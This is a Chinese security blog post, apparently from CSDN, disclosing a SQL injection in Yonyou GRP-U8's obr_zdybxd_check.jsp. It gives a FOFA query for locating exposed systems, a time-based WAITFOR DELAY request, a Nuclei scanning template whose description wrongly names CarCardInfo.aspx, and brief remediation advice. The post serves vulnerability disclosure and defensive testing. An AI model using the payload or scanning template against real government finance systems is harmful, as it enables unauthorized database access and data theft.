用友GRP-U8 obr_zdybxd_check.jsp SQL注入

【产品介绍】

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

【漏洞介绍】

用友GRP-U8 obr_zdybxd_check.jsp SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

【资产测绘Query】

 
  1. fofa语法:app="用友-GRP-U8"

【产品界面】

【漏洞复现】

【poc】
 
  1. GET /u8qx/obr_zdybxd_check.jsp?mlid=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
  2. Host: 127.0.0.1
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  4. Connection: close

【Nuclei-Poc】

 
  1. id: yongyou-grp-u8-sql-injection
  2. info:
  3. name: yongyou grp u8 sql injection
  4. author: xxx
  5. severity: high
  6. description: Checks for SQL injection vulnerability in CarCardInfo.aspx using response size and status code.
  7. tags: sqli
  8. requests:
  9. - raw:
  10. - |-
  11. @timeout=5s
  12. GET /u8qx/obr_zdybxd_check.jsp?mlid=1%27;WAITFOR%20DELAY%20%270:0:3%27-- HTTP/1.1
  13. Host: {{Hostname}}
  14. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  15. Connection: close
  16. matchers-condition: and
  17. matchers:
  18. - type: dsl
  19. dsl:
  20. - 'duration>=3'
  21. - 'status_code == 200'
  22. condition: and

【验证】

.\nuclei -l 1.txt -t 1.yaml

【修复建议】

1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

   声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值